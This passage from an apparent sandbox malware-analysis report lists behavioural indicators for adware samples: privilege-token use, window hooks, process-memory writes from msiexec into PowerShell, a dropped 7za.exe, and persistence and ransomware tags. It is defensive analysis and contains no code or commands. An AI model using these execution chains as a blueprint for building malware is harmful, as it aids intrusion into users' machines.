N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1564 wrote to memory of 4348 N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1564 wrote to memory of 4348 N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1564 wrote to memory of 4348 N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe
PID 1928 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 2564 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2564 wrote to memory of 4372 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 4372 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 4372 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2332 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2332 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2332 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2564 wrote to memory of 2084 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 2084 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 2084 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1928 wrote to memory of 5076 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 5076 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 5076 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5076 wrote to memory of 3752 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3752 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3752 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3936 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 1120 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 1120 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 1120 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1120 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\BBWC\7za.exe
PID 1120 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\BBWC\7za.exe
PID 1120 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\BBWC\7za.exe
PID 5076 wrote to memory of 2220 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2220 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2220 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2496 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2496 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2496 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1928 wrote to memory of 1756 N/A C:\Windows\system32\msiexec.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe
PID 1928 wrote to memory of 1756 N/A C:\Windows\system32\msiexec.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe
PID 1928 wrote to memory of 1756 N/A C:\Windows\system32\msiexec.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe
PID 5076 wrote to memory of 4748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 4748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 4748 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3856 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\OpenWith.exe
PID 5076 wrote to memory of 3856 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\OpenWith.exe
PID 5076 wrote to memory of 3856 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\OpenWith.exe
PID 2564 wrote to memory of 1712 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 1712 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2564 wrote to memory of 1712 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1928 wrote to memory of 4804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 4804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1928 wrote to memory of 4804 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4804 wrote to memory of 4172 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4172 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4172 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2952 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2952 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2952 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2924 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2924 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2924 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 740 N/A C:\Windows\system32\OpenWith.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
